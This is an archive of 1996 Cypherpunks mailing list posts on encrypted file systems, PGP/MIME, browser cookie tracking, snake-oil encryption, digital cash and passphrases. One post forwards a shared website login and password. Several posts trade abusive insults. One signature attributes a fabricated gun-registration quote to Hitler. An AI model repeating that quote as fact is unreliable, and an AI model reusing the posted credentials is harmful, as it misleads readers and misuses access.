MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a hard-drive/partition encrytion program that has been ported to both DOS and Linux/UNIX based systems? I am searching for a system that, obviously, allows both reading and writing of secure/encrytped data.

You help will be greatly appreciated.

--
Tangent <tangent@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tangent@alpha.c2.org (Tangent)
Date: Tue, 16 Jul 1996 23:42:45 +0800
To: cypherpunks@toad.com
Subject: Encrytions over multiple platforms
Message-ID: <199607160331.UAA17969@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a hard-drive/partition encrytion program that has been ported to both DOS and Linux/UNIX based systems? I am searching for a system that, obviously, allows both reading and writing of secure/encrytped data.

You help will be greatly appreciated.

--
Tangent <tangent@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 16 Jul 1996 15:16:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: d.Comm: Your Login Information (fwd)
Message-ID: <199607160133.UAA25165@homeport.org>
MIME-Version: 1.0
Content-Type: text


password, limited to 8 characters is "cypherpu"
Has anyone set a psuedo-standard for these things?

Adam
----- Forwarded message from hotlists@d-comm.com -----

           Login: cypherpunks
          Passwd: 107084
             URL: http://www.d-comm.com/
 
Note: If you wish to change your allotted password, Password management is
      available at : http://www.d-comm.com/s-bin/hl_passwd
----- End of forwarded message from hotlists@d-comm.com -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 16 Jul 1996 20:16:17 +0800
To: cypherpunks@toad.com
Subject: Re: Clueless "Attachment converted" uses
In-Reply-To: <v03007604ae10503d28f6@[192.187.162.15]>
Message-ID: <Pine.LNX.3.94.960715205141.130A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 15 Jul 1996, David Sternlight wrote:

> At 6:01 AM -0700 7/15/96, Simon Spero wrote:
> >On a very similar note - could people who are using clear-text PGP
> >signatures with mime use text/... instead of application/...; that way
> >people without pgp will see the message text without having to mess with
> >their mailcaps (that's the way text/* is supposed to work)
> 
> It's kludgy, I agree, but that's the way the example PGP translator for our
> mailer that some of us are using works right now. If someone rewrites that
> part of it, I'm sure we'd all be happy to switch. Dunno if there's an easy
> patch with ResEdit. (It's for the Mac.)

I think Simon was referring to the obsolete draft that defined the content
type "application/pgp".  The multipart/signed content type, IMHO, is hardly
kludgy and is the best way to MIME encapsulate data.  "Application/pgp" is
definitely kludgy.

BTW, those of you who do use PGP/MIME signing software should tweak the
configuration a bit so there isn't an apostrophy in the MIME boundary.  This
makes it very difficult to verify the signature using metamail and possibly
other MIME interpreting programs.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMerp+7Zc+sv5siulAQHm1gP8CnOUcwZfaQNMU0pZCo3k2efQTsfQaNGJ
pjp3/ZycF3woyT8AST+fTqJjJrmFjJ5OLmqld3phzRJ8ANk7hHJzLQ+Sef9pwDl/
n1df6Tg8crtrxPfPSF6JR9XDGEjpbBqWBsxlH9T4aA1Ra7d78DC3sUvRzhCQWOnz
dlgL/3aV4Bg=
=Y9TP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 16 Jul 1996 23:55:07 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EA98B6.446B@netscape.com>
Message-ID: <31EB1655.773C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> 
> http://wwwus.netscape.com/eng/US-Current

It looks like the majority of download failures are caused by people
using browsers that don't support cookies.  If you aren't sure that
the browser you're using supports cookies, then try Netscape Navigator.
If are using Netscape (or some other cookie-capable browser) and are
still getting a "No Cookie" error, please let me know.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 16 Jul 1996 20:44:43 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607160436.VAA15790@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



I agree with Raph's analysis, that for something like RSA encryption
to work, you need to have a strong public key infrastructure, and that
the Gov't could probably build one that people would use; and that would
destroy their privacy.

My prediction, though, is that because Diffie-Hellmann loses its patent
protection so soon, in just over a year now, that RSA, or any persistent-key
system, will not tend to be used for e-mail, phone conversations, or other
types of communication; for D-H, no infrastructure need be in place.
Now, it's true that you can't use D-H for authentication, and that is
a tremendous disadvantage.  Still, you could use the established
gov't PKI to do the authentication, and use D-H for the exchange of
keys.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 16 Jul 1996 20:43:43 +0800
To: "'cypherpunks@toad.com>
Subject: Home Made Telephone Voice Changer
Message-ID: <01BB732D.FCFA3840@ip134.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


I am not sure if this area is right for asking information on how to make home made voice changer for telephones... If anyone know, please share. Thanks!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 17 Jul 1996 01:14:14 +0800
To: Christopher Hull <nozefngr@apple.com>
Subject: Re: CookieScan 0.0 rev 0
Message-ID: <199607160449.VAA02710@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 7/15/96 -0800, Chris Hull wrote:
>Do y¹all think there might be an interest in a 
>utility which would allow the user to deal with 
>browser cookies?

There might, but it's a difficult problem, and 
implementation-dependent and doesn't always tell you much.  
While your browser may store cookies in a disk file to use 
between sessions, by the time the cookie gets
filed on disk, it's long since cooled down and may have been
written over multiple times.  The interesting time to detect cookies
is when they arrive - this means either watching the network data
stream for cookies (non-portable, unless you use a cookie-proxy,
which is the obvious way to implement it), or else grubbing around
in the browser's memory (highly non-portable, unless you're
modifying the browser source.)  

The "doesn't always tell you much" is because cookies often
seem to contain encrypted or hashed data that isn't meaningful
to the browser-user, only to the cookie-originators.

The cute trick you can do with cookies, which is probably used by
advertising sites such as doubleclick.com, is for the web page owner
to include an IMG which is an href to a CGI program at a cookie company.
The CGI program is able to look at the HTTP_REFERER variable,
which tells what page you were last on, and can therefore create
or use cookie information that tracks where you've been between companies
(e.g. Alice can contract with Cookies Inc. to tell if you've been
to Bob's site recently, if Bob also uses Cookies Inc.)

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 16 Jul 1996 16:20:38 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Opiated file systems
In-Reply-To: <199607151158.HAA28540@unix.asb.com>
Message-ID: <199607152049.VAA00313@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rob <WlkngOwl@unix.asb.com> writes:
> > Some more thoughts on encrypted file system design criteria.
> > A wish list:
> > 
> > - Choice of secret key encryption algorithms (IDEA, 3DES, MDC, Blowfish)
> 
> Nice in theory. Awful in practice.  Requires code for managing keys, 
> encrypting and decrypting for ea. algorithm be resident in memory.  

No need to have all the code in memory, I think you ought to be able
to keep the code in an overlay, or something of that nature.

> For some systems (MSDOS), free memory is at a premium... (one of the 
> reasons SecureDrive is popular is because it takes only 2.5k).  It's 
> not worth wasting memory for handling several algorithms when only 
> one is going to be used in most cases.

I take your point about memory consumption under DOS, though
presumably it would be possible these days to load data high.  I think
SFS supports this for instance.

> [...]
>  
> > - High performance (hand optimised assembler for each architecture)
> 
> So much for maintaining code across platforms.

Only the secret key algorithms, 80x86 code would be the highest
priority coz they're the slowest (well the old ones are).  You're
going to need very OS specific code for the low level parts of the
file system anyway.

> > - Compression
> 
> Not worthwhile.  Use a Stacker or JAM driver over the encrypted 
> partition on a PC, for instance.  Keep compression and crypto 
> separate utilities... keeps bugs from one interfering with another 
> and reduces complexity of both drivers; also, if one wants crypto 
> w/out compression or compression w/out crypto, no wasted memory (see 
> above about RAM being at a premium).

One of the requirements some earlier posters gave was that they would
like to be able to accesss the same data with different OSes (the
example was to access the same partition with linux,win95, and winNT).
Double space isn't available for unix.  (There was a read-only version
for linux, but this seems to be currently unmaintained.)

So one reason to include a compression module would be for portability
of data.

I agree with your points about separating concerns and keeping crypto
and compression reasonably separate to keep bugs in compression code
having the potential to affect crypto code.  It would probably be
prudent to use OS segment protection, and page locking to protect
crypto code and data from being accidentally overwritten, and written
to swap respectively.

> > - Ability to chain algorithms (IDEA and then 3DES for example)
> 
> Why?  Doesn't necessarily increase security, esp. considering the 
> performance hit (memory... see above, time, key management).

Hmm, say that you were using MDC with md5 as the hash (before
Dobertin's recent pronouncements, naturally no one would do this now),
if Dobertin comes through with the general case you might wish you had
combined it with 3DES...

For the paranoid only, but a nice option I think,

> [uncontenious stuff]

> > - Facility for duress key, with the real data hidden in the unused
> >   space of the first encrypted drive.  To increase the plausible
> 
> Huh?!?

Encrypted filesystems are for hiding data from other parties.  If your
threat model includes law enforcement such a feature would be most
useful.  You would have data which you would not mind agents
obtaining, and have the "real" data hidden in a second file system.

When you are supeonaed for your key, you reveal the 1st file systems
key.  That key does not reveal anything about the 2nd partition, not
even it's existance.

The second file system would be hidden in the blocks not used with the
1st file system.  To access the 2nd file system you would need to tell
the file system driver the keys for both file systems -- the 1st key
so that it could find which were the unused blocks in the 1st file
system, the 2nd key for access to the hidden file system.

> >   deniability all unused blocks within a file system should be filled
> >   with garbage, so that it is not possible to tell if there is more
> >   data there.
> 
> If the algorithm is good, this shouldn't matter.  The only way a 
> person could tell if a sector is unused is if that person was able to 
> mount the partition already.

Yes, that's the idea -- your 1st key has been supeoned is the threat
model.

> > - File system steganographically hidden in files on another file
> >   system (encrypted or not).  Support for a wide selection of file
> >   formats (Aiff, Wave, Midi, JPEG, GIF, RGB, MPEG).
> 
> Now this is getting nutty!!!  Never mind the size, 

4 gig disks are cheap these days

> compleixty and amazing slowness of such a driver...  you'd have to
> have audio or video files of gigabytes in size to be able to store
> anything of use.

Indeed you would.  So?

> > - Ability to use stegoed file system in files on an unencrypted
> >   file system, and boot from a floppy to access stegoed file system,
> >   with no other traces left on hard disk.
> 
> Why?  The authorities would wonder why you have an 8 Gig JPG on your 
> disk and figure you're using it for stego, or you're crazy, or both, 
> and have you committed.

Nah, you'd buy some video editing equipment, perhaps a photo-CD
recorder, start a business doing photo-retouching (I know someone who
does this btw, they use DAT tapes just to shift the Gbs they get
through), video editing, whatever.  All quite plausible.

Adam
--
only quiche eaters need ritalin...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Tue, 16 Jul 1996 23:38:04 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: (fwd) krypt13i.zip Enkryptonator: Homonymous key encryption system, R. Newton
In-Reply-To: <199607152224.SAA04880@yakko.cs.wmich.edu>
Message-ID: <Pine.BSI.3.93.960715220946.5788A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I downloaded the thing... here's what I posted to sci.crypt:

Looks like snake oil to me... the whole thing comes down to each executable
having a unique "registration number" so that only that copy of the software
can decrypt with that "registration number".  You encrypt with a key
of between 5 and 10 text characters, and you provide the registration number
of the destination party. The "registration number" and key get combined
in some way to form the encryption key.  (Registration numbers are public
information).  Since ONLY ;) the destination party has the correct copy of
the software, only they can decrypt the data, hence the key can be passed
over an insecure channel. Heh. They say the encryption algorithm is a form
of substitution cipher.

SO.... since the "registration number" and key are public, the only thing
keeping this together is the lack of the algorithm, which of course doesn't
keep it together at all.

Fun...

On Mon, 15 Jul 1996, Damaged Justice wrote:

> [Anyone know more about this one? "Homonymous" in this context sounds a
> tad oily.]
> 
> >From: mjk@reimari.uwasa.fi (Mika Koykka)
> Newsgroups: comp.archives.msdos.announce
> Subject: krypt13i.zip Enkryptonator: Homonymous key encryption system, R. Newton
> Date: 15 Jul 1996 11:32:39 +0300
> Lines: 82
> 
> Thank you for your contribution. This upload is now available as
>  60605 Jul 2 22:10 ftp://garbo.uwasa.fi/pc/crypt/krypt13i.zip
> 
> : Date: Sun, 14 Jul 1996 15:10:55 -0500
> : From: Enkryptonator <enkrypt@flash.net>
> : To: pc-up@uwasa.fi
> : Subject: krypt13i.zip Homonymous key encryption uploaded
> : 
> : I mailed a previous Email today, but it contained a typo in the file name
> : uploaded.
> : this message contains no such typo.
> : 
> : File name:
> :            KRYPT13i.ZIP
> :                       Enkryptonator: Homonymous key encryption system.
> : Replaces:
> :         KRYPT12.ZIP
> : Suggested Garbo directory:
> :         crypt
> : Uploader name & email:
> :         Richard Newton, enkrypt@flash.net
> : Author or author company:
> :         Richard Newton
> : Email address:
> :         enkrypt@flash.net
> : Surface address:
> :         Box 866292 Plano Tx 75086 USA.
> : Special requirements:
> :         Developed on MS-DOS 386 platform.
> :         Math co-processor recommended, but not required.
> : Shareware payment required from private users:
> :         Yes, but not from students.
> : Shareware payment required from corporates:
> :         Yes.
> : Distribution limitations:
> :         None
> : Garbo CD-ROM distribution allowed without extra preconditions:
> :         Yes.
> : Demo:
> :         No.
> : Nagware:
> :         No, Displays none of the behavior described in your
> :         instructions.
> : Self-documenting:
> :         Yes.
> : External documentation included:
> :         Yes, about 70Kb (unzipped).
> : Source included:
> :         No.
> : Size:
> :         60kb zipped.
> : 10 lines description:
> : 
> : Enkryptonator is a newly developed encryption system based on the
> : principles of homonymous key cryptography invented by Enkryptonator Co.
> : Homonymous key systems are an exiciting, new breakthrough, that solve
> : the 'key management' problem without resorting to 'public key'
> : cryptography. No more unwieldy, impossible to remember, binary keys.
> : Enkryptonator is easy to use.  Because of Enkryptonator's unique design
> : no one who intercepts your encryption in an unauthorized manner can
> : decrypt your file -- even if he knows the key of encryption! Everyone
> : has a right to privacy and Enkryptonator will provide you a means of
> : securing your personal and private concerns from unwanted intruders.
> : 
> : Long description:
> : 
> : This is the 1.3 International Shareware version of Enkryptonator.
> : The international version will only allow a single key of encryption
> : in order prevent running a-foul of US export control regulations on
> : the export of encryption technology.
> : 
> : Version 1.3 introduces a 5% speed improvement and minor changes in
> : messaging.  Version 1.3 is incompatible with version 1.2 and version
> : 1.1.  These are the only code changes.  The most significant reason for
> : releasing 1.3 is to provide users with more comprehensive and updated
> : user documentation.
> 
> .................................................................
> Mika Koykka, mjk@uwasa.fi   http://www.uwasa.fi/~mjk/
> Moderating at garbo.uwasa.fi http://garbo.uwasa.fi/ FTP archives
> Computer Centre, University of Vaasa,  Box 700, FIN-65101 Finland
> 
> 
> --
> "Your wish is my command, if you know what's good for you, bitch."
>   - William Shakespeare
> (Or perhaps it was his brother Fred who said that.)
>  
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMeskYC/fy+vkqMxNAQFybAQAh7ZC0fHK8OWv3VLS5x5bl023cbXZPXFU
HXy3e0jH2rMTM2SPFfp/2hwLjx+msoL6cguV+duDf7x1dqgsE+zEHshx1JKCvLUh
1LwJ9N0iNWErBJqGbt2l5LSI1d98VcOuJ6OO/Sa0VCmJtcqF4dnvDpkb3XdD3J/z
9QwCMsSEnaQ=
=Iuxo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 21:01:23 +0800
To: "Steven Seyffert" <bryce@digicash.com>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
Message-ID: <199607160519.WAA13505@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 AM 7/16/96 +0200, Steven Seyffert wrote:
>
>----------
>: From: bryce@digicash.com
>: To: David G.W. Birch <daveb@hyperion.co.uk>
>: Cc: Multiple recipients of <e$@thumper.vmeng.com>; cypherpunks@toad.com
>: Subject: Re: #E-CASH: PRODUCT OR SERVICE? 
>: Date: maandag 15 juli 1996 15:36
>
>: 4.  Privacy.  The privacy of Ecash(tm) payers is mathematically
>: unconditional.
>:
>Just like the privacy of e-mail and the independance of the WWW once was.
>

Notice he says there's PAYER privacy.  Payee privacy is possible, but not 
implemented by Digicash.  Payee privacy is going to be a feature of a 
SUCCESSFUL digital cash system.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Tue, 16 Jul 1996 22:04:20 +0800
To: cypherpunks@toad.com
Subject: DCSB: Betting on the Future
Message-ID: <v01540b01ae10aef56be8@[156.80.2.176]>
MIME-Version: 1.0
Content-Type: text/plain


If I can't wear a V2 PGP T shirt It ain't good enuf to attend... cheap lunch too

Charley


>X-Sender: rah@tiac.net
>Mime-Version: 1.0
>Date: Mon, 15 Jul 1996 12:07:12 -0400
>To: cypherpunks@toad.com
>From: Robert Hettinga <rah@shipwright.com>
>Subject: DCSB: Betting on the Future
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>
>--- begin forwarded text
>
>
>X-Sender: rah@tiac.net
>Mime-Version: 1.0
>Date: Mon, 15 Jul 1996 11:26:33 -0400
>To: dcsb@ai.mit.edu
>From: Robert Hettinga <rah@shipwright.com>
>Subject: DCSB: Betting on the Future
>Sender: bounce-dcsb@ai.mit.edu
>Precedence: bulk
>Reply-To: Robert Hettinga <rah@shipwright.com>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>
>                 The Digital Commerce Society of Boston
>
>                               Presents
>
>                             Duane Hewitt
>                             Idea Futures
>
>                       "Betting on the Future"
>
>
>                        Tuesday, August 6, 1996
>                               12 - 2 PM
>                   The Downtown Harvard Club of Boston
>                     One Federal Street, Boston, MA
>
>
>Duane says:
>
>> I am a Molecular Biologist by trade but I am fascinated by all aspects of
>> science and technology and especially their long term ramifications. I am
>> completing my Master's Degree thesis as well as working full time at the
>> University of Massachusetts at Amherst. I have some part time work
>> maintaining Web pages and I have been involved with the Idea Futures Web
>> site from the very beginning. I also am currently working on a hypertext
>> reference on the biology of aging. Many of these interest can be accessed
>> from my home page at http://www.lucifer.com/~duane
>>
>> I will introduce the concept of Idea Futures which is a market in which
>> the odds of future events are set by betting. It is designed to reward
>> those who can accurately forecast future outcomes. It has been recognized
>> by the Austrian Broadcast System, and the Point Survey and mentioned in
>> _Wired_. I will discuss the implications of such a market as well as some
>> of the history behind it. I will also propose how a similar market could
>> be used to construct a market based voting system.
>
>
>
>This meeting of the Digital Commerce Society of Boston will be held on
>Tuesday, August 6, 1996 from 12pm - 2pm at the Downtown Branch of the
>Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
>This price includes lunch, room rental, and the speaker's lunch. ;-).  The
>Harvard Club *does* have dress code: jackets and ties for men, and
>"appropriate business attire" for women.
>
>We need to receive a company check, or money order, (or if we *really* know
>you, a personal check) payable to "The Harvard Club of Boston", by
>Saturday, August 3, or you won't be on the list for lunch.  Checks
>payable to anyone else but The Harvard Club of Boston will have to be sent
>back.
>
>Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
>Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
>Club of Boston".
>
>If anyone has questions, or has a problem with these arrangements (We've had
>to work with glacial A/P departments more than once, for instance), please
>let us know via e-mail, and we'll see if we can work something out.
>
>Planned speakers for the following few months are:
>
> September   Tatsuo Tanaka    Some Economics of Digital Cash
> October     Philippe LeRoux  Stock Exchanges and the Web
>
>We are actively searching for future speakers.  If you are in Boston on the
>first Tuesday of the month, and you would like to make a presentation to the
>Society, please send e-mail to the DCSB Program Commmittee, care of Robert
>Hettinga, rah@shipwright.com .
>
>For more information about the Digital Commerce Society of Boston, send
>"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
>to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
>message to majordomo@ai.mit.edu .
>
>Looking forward to seeing you there!
>
>Cheers,
>Robert Hettinga
>Moderator,
>The Digital Commerce Society of Boston
>
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMepi6vgyLN8bw6ZVAQFsOwP/UuOoWa0LUEyY4dmQ21KIR4GwhB6PurSa
>L97eVsbVOigP+TVPFJX7RKqYhCxIL8gDUnSRimGnATmhLo5wdE0UXvgakeGaD5s+
>vKPfhuaG9/MnuZvWFbBEZOrTTKqVE8bfoU2yiw6xTvhyQY0lDA2BSO8vjip28nOA
>0Wkuh1VUBhY=
>=/5+9
>-----END PGP SIGNATURE-----
>
>-----------------
>Robert Hettinga (rah@shipwright.com)
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"'Bart Bucks' are not legal tender."
>                -- Punishment, 100 times on a chalkboard,
>                       for Bart Simpson
>The e$ Home Page: http://www.vmeng.com/rah/
>
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
>In the body of the message, write:  unsubscribe dcsb
>Or, to subscribe,           write:  subscribe dcsb
>If you have questions, write to me at Owner-DCSB@ai.mit.edu
>
>--- end forwarded text
>
>
>
>-----------------
>Robert Hettinga (rah@shipwright.com)
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"'Bart Bucks' are not legal tender."
>                -- Punishment, 100 times on a chalkboard,
>                       for Bart Simpson
>The e$ Home Page: http://www.vmeng.com/rah/
>

                      Charles E. Sparks
                    Booz Allen & Hamilton
         http://www.clark.net/pub/charley/index.htm
           In God we trust, All Others we encrypt
   Public Key at:  http://www.clark.net/pub/charley/cp_1.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Wed, 17 Jul 1996 00:29:38 +0800
To: cypherpunks@toad.com
Subject: PGP 3.0 / Windows
In-Reply-To: <v01540b01ae10aef56be8@[156.80.2.176]>
Message-ID: <199607160545.WAA01000@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone heard anythong about PGP 3.0?  Is it still due Real Soon Now?  Or 
might it be worthwhile to break out VC++ and do a port as a cpunks cooperative 
project?
Jonathan Wienke


"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. A thirty (30) day 
amnesty period is permitted for these firearms to be turned over to the local 
authorities.  At the end of this period, a number of citizen groups refuse to 
turn over their firearms.  Consider the following statement:  I would fire upon 
U.S. citizens who refuse or resist confiscation of firearms banned by the U.S. 
government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 16 Jul 1996 19:48:39 +0800
To: cypherpunks@toad.com
Subject: Re: Why <jf_avon@citenet.net> was blocked.
Message-ID: <9607160301.AB00207@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 Jul 96 at 21:28, Anonymous Remail Service wrote:

> >On 13 Jul 96 at 22:22, root@mail.demon.net wrote:
> >
> >Could you please explain me why my message was blocked?
> 
> Because you're an asshole? Why in the world would you ask the
> entire fucking cypherpunks list, instead of just
> root@mail.demon.net, to "please explain me[SIC] why my message was
> blocked?" You are constantly harassing, so you were blocked. Deal
> with it. me

Dear flamer,

Obviously, you did not learn to read.  Go back to school.

I asked the root@mail.demon.net to explain why I was blocked and I
asked CPunks to reply to the post "below", which was my original
question.


What I asked on the CPunks list was the following:

Is the fact that a realdeal.exe /per (wiped with zeroes)  processed
drive weakens the idea encryption of a Secure Drive 1.4a'ed drive?

So, dear anonymous coward, go to hell.

Jean-Francois Avon
- -- 
DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
JFA Technologies
    R&D consultants: physicists technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: PGP Public key: http://w3.citenet.net/users/jf_avon

iQEVAgUBMeqeosiycyXFit0NAQFgbQgAnsRkMewRP8VezehwytWIcIKh/ty2UVQo
/rh8BhUW+VePXCpL1rudLzr9ZWaq6akPTkpA5HHmDLARGMw2fu/0ZSuS/OSlGgz6
sKSXbKtTHqVCn+mOvpl2+lBD5bt4LTIoanY9a/uQ6rt5pZG9B4m5ztyM945vY62C
QVyfvqEh1c2Iqbbud9BmeLnmAoaM0cXQJdeyhOerZ/38k+2/sUXOWtVlz3h1Rf6g
3SptAJ9wdsbdDPBuy0AC3MIQHiTgGAClDDOZAbsIB3v4NapqedktdcyGXQj9XKpF
O6qn6rEnWhek0JrDVFBwyXbXu9JgQfqNetd7a5jvDM57bxBIpifA4A==
=1T1A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 16 Jul 1996 21:53:25 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <Pine.SCO.3.93.960715185059.7939B-100000@grctechs.va.grci.com>
Message-ID: <w735qD148w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Modems on stun...

"Mark O. Aldrich" <maldrich@grci.com> writes:
...
> After seeing what happened to sci.crypt (it was essentially wrecked for
> anyone without killfile capability), I'd caution the c'punkers
> (particularly the more vocal ones) to NOT TAKE THE BAIT.  It's only
> natural that Perry, Jim, and the others be the first to take exception
> to DS's stuff.  It's probably only going to get worse as DS is the
> consummate flame king and he is at least as relentless as Detweiler.

I already got some shit from DS.  I saw right away that he's an asshole,
so I won't be responding to anything {he|she|it} says.  What a maroon.

I think Lance Deitweller is much smarter and more coherent. I exchanged
some e-mails with and and he sounds like a very reasonable and nice guy.

Thanks for the warning,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 20:28:39 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
In-Reply-To: <2.2.32.19960715184219.00827588@panix.com>
Message-ID: <v03007600ae10e42fe927@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM -0700 7/15/96, Duncan Frissell wrote:

>Yes, David I would say you practice "contumely" -- Rudeness or contempt
>arising from arrogance; insolence.  But then so do I.

That's not what my dictionary says, and what I said was that your message
deserved it.

Watch closely--there are some subtle distinctions between what you claim
and what my dictionary says. Contumely is "harsh language, arising from
haughtiness or contempt". In the case of your message, the harsh language
it deserves arises from contempt for the way you said what you said.

Harsh language need not be rude, and arrogance and insolence don't enter
into my dictionary's definition (Merriam Webster's Collegiate Dictionary,
Tenth Edition).

Finally, saying that it deserves contumely is not itself using harsh
language but rather is a fairly polite form of derision. Had I heaped
contumely on it, that might have been using harsh language. I didn't,
because that would have been counterproductive. Thus your accusation is
invalid, despite your attempt to soften it with the "me, too".

Ain't educated rhetoric grand.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jul 1996 14:31:35 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <ae1012b2000210044c67@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:33 PM 7/15/96, David Sternlight wrote:

>It is pretty easy to defend against dictionary attacks by using an expanded
>character set--mixed caps and lower case; numbers substituted for some
>letters according to easily-remembered personal rules.
>
>"Da5id" in "Snow Crash" by Neal Stephenson is an obvious example, since the
>"v" is a roman numeral 5. Another is the "Compuserve method" of inserting
